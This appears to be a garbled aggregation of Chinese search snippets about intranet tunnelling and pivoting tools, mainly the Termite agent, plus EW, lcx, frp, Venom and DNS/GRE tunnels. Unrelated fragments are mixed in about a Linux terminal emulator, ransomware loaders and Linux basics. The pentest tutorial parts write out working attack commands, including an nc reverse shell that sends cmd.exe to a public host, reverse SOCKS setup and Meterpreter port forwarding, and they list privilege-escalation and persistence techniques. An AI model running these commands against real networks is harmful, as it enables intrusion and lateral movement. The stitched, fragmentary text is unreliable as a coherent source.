利用Termite进行隧道穿透 Termite是一款内网穿透工具,该工具比较小巧不到1MB大小,但功能较为强大,分为管理端admin和客户端agent。...它支持多平台、在复杂内网环境下Termite渗透适用性更强,操作也极为简便,下述以它为案例进行隧道穿透。实验拓扑如图1-1所示。...假设我们获取到Web服务器的权限后,想要对靶机获取权限,此时可以使用Termite工具进行隧道穿透,利用Termite工具下载靶机的核心文件,具体环境如表1-1所示,下面进行演示。.../admin_linux_x86_64 -c 192.168.0.25 -p 8888命令,成功连接Web服务器后,使用show参数查看当前页面下存活的节点,如图1-3所示。.../admin_linux_x86_64 -c 192.168.0.25 -p 8888命令连接Web服务器开启监听的8888端口。如图1-5所示。
为 Termite 添加列目录功能 为 Termite 添加 Windows 支持 RESTful API 添加认证功能 重新设计 Web UI 记录用户与 Shell 的交互,日后可以回放复盘(类似...asciinema) 添加主机发现等其他后渗透功能 多层 Termite 级联 集成提权功能 持久化 集成 rootkie 提供一键升级 Metepreter Platypus 快速上手 运行...Linux ./platypus_linux_amd64 Windows ....反弹一个反向 Shell Tips Platypus 支持普通反向 Shell 与 Platypus 本身的二进制 Shell(名为:Termite), 强烈建议您在拿到普通反向 Shell 之后使用...Upgrade 命令将其升级成 Termite Shell,或者直接使用 Termite 来反弹。
https://github.com/ehang-io/nps/blob/master/README_zh.md 代理工具 Termite 是EW(EarthWorm)的最新版, 官方链接:http:/.../rootkiter.com/Termite/ 其他的作用都很好就是起代理的时候没有测试成功,不知道为什么 Venom https://github.com/Dliv3/Venom 这个比较好用 在本地.../agent_linux_x64 -rhost 192.168.0.103 -rport 9999 然后在本地就可以socks代理 本地代理客户段可以使用 冰蝎(测试成功) 通过冰蝎的内网穿透功能可以起...:反向连接 在公网主机(2.2.2.2)上监听端口: 2.2.2.2 nc -lvp 4444 在内网主机(1.1.1.1)上远程回连: nc -t -e cmd.exe 公网主机ip 4444 linux
终端模拟器是Linux操作系统中常用的工具,它提供了一个图形界面来模拟命令行环境。...在本文中,我们将介绍2023年的22个最佳Linux桌面终端模拟器,它们具有各种功能和特点,适合不同类型的用户需求。...Termite:Termite是一个轻量级的终端模拟器,采用GTK+工具包构建。它具有可定制的外观和键盘快捷键,适合追求简洁和高度自定义的用户。...总结 Linux桌面终端模拟器在提供命令行操作的同时,还具备了丰富的功能和特性,使用户可以更加高效地使用命令行界面。...在本文中,我们介绍了2023年的22个最佳Linux桌面终端模拟器,它们涵盖了各种特性和用途,适合不同类型的用户。
一、LCX lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap, lcx有两大功能: 1)端口转发(listen和...Linux版使用方法: 先在具有公网ip的主机上执行: ....然后在Linux系统命令行下执行 ssh 公网主机ip 7777 即可连接内网主机。...三、socks代理工具 1).Termite 是EW(EarthWorm)的最新版,官方链接: http://rootkiter.com/Termite/ 主要特性: 多平台支持、跳板机互联、正反向级联...127.0.0.1 -p 4444 将新的agent加入拓扑: agent_windows_x86.exe -c 127.0.0.1 -p 4444 具体使用方法可参考: http://rootkiter.com/Termite
创建企业密码字典 进入内网 基于企业弱账号漏洞 基于系统漏洞进入 网站应用程序渗透 无线Wi-Fi接入 隐匿攻击 Command and Control Froting 代理 内网跨边界应用 EW Termite...内网拓扑架构分析 常见信息收集命令 常用端口扫描工具 1、用户列表 2、进程列表 3、服务列表 4、端口列表 5、补丁列表 6、本机共享 7、本用户习惯分析 8、获取当前用户密码工具 Windows Linux...第三方信息收集 权限提升 内核溢出提权 计划任务 SUID 系统服务的错误权限配置漏洞 不安全的文件/文件夹权限配置 找存储的明文用户名,密码 BypassUAC 提权 常用方法 常用工具 Windows Linux...权限维持 Windows Linux 1、密码记录工具 2、常用的存储Payload位置 3、Run/RunOnce Keys 4、BootExecute Key 5、Userinit Key 6、Startup
---- 端口转发工具:NC、LCX、regGorg、venom、ngrock… 代理链工具:proxychains(Linux)、proxifier(windows)... ---- 一、端口代理工具...---- 3.Termite工具 #软件作者教学视频: http://rootkiter.com/toolvideo/toolmp4/1maintalk.mp4 http://rootkiter.com...Termite是一款极度小巧灵活的跳板机。...正向代理 7.1.1 服务端设置 ①下载安装 wget https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux...#linux远程登录 proxychains ssh root@192.168.75.131
---- 内网跨边界应用 前言 与内网渗透系列:内网穿透(隧道)学习可以互相补充 一、内网跨边界转发 1、NC端口转发 netcat瑞士军刀 参见Kali linux 学习笔记(四)基本工具熟悉——nc.../ew -s rssocks -d 127.0.0.1 -e 7777 2、Termite 官网:http://rootkiter.com/Termite/ github:https://github.com.../rootkiter/Binary-files/tree/bd3223082afbf88421fe391eb55b9eb2da7d533e 使用说明:https://rootkiter.com/Termite...然后远程连接转发端口即可建立socket代理隧道 对于aspx的网站假如总是报错,可以尝试ashx脚本 PHP程序确认php.ini中socket模块正常开启并且可用,reGeorge也提供了nosocket脚本 linux
协议进行隧道穿透ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite...5)接下来我们执行类似操作,为Linux受控主机创建名为tun2的GRE隧道,之后通过执行ip link set tun2 up mtu 1400命令,启动名为tun2的GRE隧道,相关执行操作命令如图...6) 同理,我们也需要在Linux受控主机侧执行ip addr add 192.168.5.2 peer 192.168.5.1 dev tun2命令来配置双方互联IP地址,其中本端GRE隧道互联IP地址为...7)通过在Linux受控主机中执行route -n命令来查看路由信息,如下图1-8所示,可以到看到已配置的路由规则。...8)当完成以上配置后进行验证,在VPS服务器中对Linux受控主机的GRE隧道IP执行Ping操作,反过来在Gre2中进行相同验证操作。验证成功,证明GER隧道成功,如图1-9所示。
此外,还有一个内存模式的病毒释放器,它获取并加载上述有效载荷,被称为Termite。其实,它倒也不是Cuba攻击者专用,之前已经被观察到运营在多次其他攻击活动中。...随后部署的是便是由Termite加载的Bughatch和 Burntcigar,它们通过禁用安全工具为数据外泄和文件加密奠定了基础。
portfwd add -l 5555 -p 3389 -r 172.16.86.153 转发目标主机的3389远程桌面服务端口到本地的8888,使用linux中的rdesktop连接本地的8888端口...lcx.exe -slave 1.1.1.1 9999 127.0.0.1 3389 因为我公网vps使用的是linux的系统,lcx对应linux的工具为portmap 。...公网vps使用ew_for_linux64文件。 首先在公网vps上执行: ..../ew_for_linux64 -s rcsocks -l 10000 -e 11000 -l为Proxifier连接的端口,-e为目标主机和vps的通信端口。...类似的工具还有:sSocks,Termite等,不需要每种都掌握,有自己用的顺手的就行。
协议进行隧道穿透 ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透 ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透 ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite...ATT&CK视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十二.内网穿透之Windows文件传输技术详解 ATT&CK视角下的红蓝对抗:十三.内网穿透之Linux
协议进行隧道穿透ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite...协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透ATT&CK视角下的红蓝对抗:十二.内网穿透之Windows文件传输技术详解ATT&CK视角下的红蓝对抗:十三.内网穿透之Linux
例如,通过这种手段,攻击者可以从Linux系统中窃取Kerberos凭据,然后在身份验证时将其传递到Windows机器上,达到横向渗透的结果。 二.前文推荐 ATT&CK视角下的红蓝对抗:一....协议进行隧道穿透 ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透 ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透 ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite...ATT&CK视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十二.内网穿透之Windows文件传输技术详解 ATT&CK视角下的红蓝对抗:十三.内网穿透之Linux...例如,通过这种手段,攻击者可以从Linux系统中窃取Kerberos凭据,然后在身份验证时将其传递到Windows机器上,达到横向渗透的结果。...攻击者可以通过这种手段从Linux系统中窃取Kerberos凭据,然后在身份验证时将其传递到Windows机器上,达到横向渗透的结果。
协议进行隧道穿透ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite...图1-11 网卡IP信息3.Linux系统下进行DNS隧道穿透利用 假设目标服务器是Linux系统,我们执行操作同上述Windows操作一样,在目标服务器下载Iodine工具后,执行iodine -...图1-12连接Linux服务器此时DNS隧道已经搭建成功,执行ifconfig命令后,得知IP是192.168.10.2,我们可以尝试用攻击者服务器进行对客户端192.168.10.2进行ssh连接,连接成功如图
0×03 socket端口转发 首先我们介绍下最为经典也是使用最为频繁的端口转发工具lcx,lcx.exe 是一个基于 socket 套接字实现的端口转发工具,它是从 linux 下的htran 工具移植到...工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。...Termite:https://github.com/rootkiter/Termite 2.reGeorg 网址:https://github.com/NoneNotNull/...6.proxychains 工具网址:http://proxychains.sourceforge.net Proxychains是一款在LINUX下可以实现全局代理的软件,性能相当稳定可靠...2.LINUX下使用proxychains KALI系统已经预装好了这个工具,我们稍作配置就可以使用,打开终端,输入命令: vi /etc/proxychains.conf # 顺便补充下LINUX下Vim
Linux 文件系统 目录 说明 bin 存放二进制可执行文件 sbin 存放二进制可执行文件,只有 root 才能访问 boot 存放用于系统引导时使用的各种文件 dev 用于存放设备文件 etc...是超级管理员 localhost 表示主机名 ~ 表示当前目录(家目录),其中超级管理员家目录为 /root,普通用户家目录为 /home/chan $ 表示普通用户提示符,# 表示超级管理员提示符 Linux...test.tar.gz 文件搜索命令 locate:在后台数据库搜索文件 updatedb:更新后台数据库 whereis:搜索系统命令所在位置 which:搜索命令所在路径及别名 find:搜索文件或文件夹 用户和组 Linux
下面将介绍一下具体Linux文件传输技巧详解。二.前文推荐ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解ATT&CK视角下的红蓝对抗:二. 内网探测协议出网ATT&CK视角下的红蓝对抗:三....协议进行隧道穿透ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite...Linux文件传输技巧详解Tar是linux系统中最常用的打包命令。...通过gzip解压文件-j通过bzip2解压文件-Z通过compress解压文件-v显示操作过程-l文件系统边界设置-k保留原有文件不覆盖-m还原文件时,不变更文件更改时间-W确认压缩文件的正确性假设在linux...四.本篇总结本文介绍了Linux系统中最常用的打包命令Tar,以及其参数和功能。Tar本身没有压缩功能,但可以调用压缩功能来实现相关功能。
领取专属 10元无门槛券
手把手带您无忧上云